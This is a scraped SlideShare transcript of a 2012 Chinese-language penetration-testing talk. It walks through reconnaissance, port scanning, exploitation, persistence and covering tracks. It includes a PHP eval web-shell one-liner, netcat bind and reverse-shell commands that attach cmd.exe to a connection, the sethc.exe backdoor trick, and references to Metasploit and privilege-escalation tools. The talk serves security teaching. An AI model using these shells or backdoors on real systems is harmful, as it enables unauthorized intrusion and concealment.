![Gaining Access
<?php @eval($_POST[cmd]); ?>](https://image.slidesharecdn.com/nisra-120522132947-phpapp02/75/talk-nisra-33-2048.jpg?cb=1668222942)
滲透測試 Talk @ Nisra
•11 likes•10,001 views
Download to read offline
Report
Orange @ NISRA 2012 / 05 / 22
Recommended
More Related Content
What's hot
What's hot(20)
Similar to 滲透測試 Talk @ Nisra
Similar to 滲透測試 Talk @ Nisra(20)
滲透測試 Talk @ Nisra
- 1. 滲透測試 Orange @ NISRA 2012 / 05 / 22
- 2. 目的 1. 以駭客、攻擊者的眼光、手法,對系統進 行安全性測試 2. 我們都是好孩子,要經過授權唷!^___^ 3. 基礎概念取向 – 技術 Detail 不講 – Web-based 自成一個章節不講
- 4. 1. Reconnaissance 2. Scanning 3. Gaining Access 4. Maintaining Access 5. Clearing Tracks 說是這樣說拉,不過實際上...
- 5. Reconnaissance 用盡一切方法拐到資訊 1. Google # 想想人肉搜索 2. Who.is 3. DNS Zone transfer 目標是? 有沒有防火牆? IDS? WAF? 網路架 構長怎樣? 網頁伺服器是不是 Virtual host ?
- 9. Cont. 案例分享 • 利用 code.google.com 進行滲透測試。 • 還記得上禮拜教的 Git 嗎?
- 10. Scanning 1. 觀察、分析、思考。 2. Scanning Port # Nmap 3. 弱點掃描 # Nessus, Metasploit # WebInspect, Acunetix 3. 猜密碼 # Hydra, Ncrack – 空密碼, 123456, 帳密相同 – 帳號永遠比密碼難猜
- 11. Cont. 案例分享 • *經典範例* • RDP 後門 – sethc.exe • 連上遠端桌面第一件事不是打帳號,是快 速按下 shift 五次!! • 同理,看到登錄畫面第一件事是猜密碼、 預設密碼。
- 12. 一般的應該像這樣
- 13. 不太正常的會長得像這樣
- 14. 比較有創意的會弄成這樣
- 15. 比較有點 Level 又會這樣做
- 16. 淡定低調風 ˊ_>ˋ
- 17. Scanning port • Port = 埠、端口、窗戶 = 主機提供服務的窗口 = 有機會入侵的地方 • 範圍從 1 到 65535 • 21 = FTP • 23 = TELNET • 80 = WWW
- 18. 檢查窗戶有沒有開? • telnet www.google.com 80 • Netcat – nc www.google.com 80
- 19. NetCat http://sectools.org/
- 21. NetCat Usage • nc apple.com 80 # 檢查 port 開啟是否 • nc apple.com 1-100 # 一次掃描多個 port • nc -v apple.com 80 # 詳細模式 • nc -l -p 80 # 開 (listen) 一個 port • nc -e cmd.exe -lp 80 # 將執行內容綁到連線上
- 22. NetCat 可以幹嘛? (1/3) • 範例主角 Cyndi & 大樹哥 • Cyndi 要看 大樹 的網頁伺服器開了沒? – Cyndi : nc 大樹 80 • Cyndi 要傳檔案給 大樹 – 大樹 : nc -lp 12345 > a.zip – Cyndi : nc 大樹 12345 < a.zip
- 23. NetCat 可以幹嘛? (2/3) • Cyndi 入侵了 大樹 的電腦,想建個後門 – Cyndi 在 大樹 的電腦執行 : – nc -lp 888 -e cmd.exe – Cyndi: nc 大樹 888 即可連上後門 888
- 24. NetCat 可以幹嘛? (2/3) • 大樹 裝了防火牆,又是在內網,怎麼辦 ? – 動動腦,三秒鐘把後門改造成 反連後門( Back connect) – Cyndi 執行 : nc -lp 888 – Cyndi 在 大樹 電腦執行 : – nc -e cmd.exe Cyndi 888 888
- 25. NMAP Usage • http://nmap.org/ – nmap -sT 127.0.0.1 # 起手式 – nmap -sT -v 127.0.0.1 # 詳細模式 – nmap -sT 127.0.0.1-254# IP range – nmap -sT -p 80 127.0.0.1 # 指定端口 – nmap -sT -p 1-8 127.0.0.1 # Port range – nmap -A 127.0.0.1 # 檢測作業系統
- 26. 實作 • 請用 nmap 找出 orangee.tw 開了網頁伺服 器再奇怪的 port 上
- 27. Gaining Access 1. 關鍵點,請善用盡上一步取得的資訊。 2. 存取權限分為 Read Write eXecute 3. 失敗請退回上一步。 • http://exploit-db.com/ • Metasploit
- 29. Cont. 案例分享 • CVE-2012-1823 – PHP CGI Argument Injection • 為啥講它?
- 31. Reconnaissance
- 32. Scanning
- 33. Gaining Access <?php @eval($_POST[cmd]); ?>
- 34. Metasploit (1/2)
- 35. Metasploit (2/2) • Exploits • Auxiliary • Payload
- 36. 實作 (有時間的話) 1. 使用 nmap 發現有開 FTP 服務 2. 使用 nc 連接發現 FTP 是由 vsftp 架設並 且版本是 2.3.4 3. 透過 exploit-db 搜尋發現 vsftp 2.3.4 存在 backdoor !! 4. 使用 Metasploit 進行攻擊 – unix -> ftp -> vsftpd234 backdoor
- 37. Maintaining Access 1. 普通使用者 vs. 最強使用者 2. 提權 ( Privilege Escalation ) 3. 翻屍體 4. 如何想來就來想走就走! – 後門 Backdoor – 木馬 Trojan – 乳器 Rootkit
- 38. 實作 ( 詳細指令在 txt 裡 ) 1. Mimikatz – 原理會提一下,不懂就算了XD 2. Enlightenment.tgz – 懶人包 3. Mempodipper.c – 原理聽聽就算了XD
- 42. Clearing Tracks 1. 俗稱的擦屁屁 2. 任何動作都會留下紀錄 3. 壞事不要幹,要幹就要懂的保護自己 舉例:
- 43. 傻傻的 • 保護當事人,徹圖
- 44. 安全的本質是什麼? http://hi.baidu.com/yuange1975/blog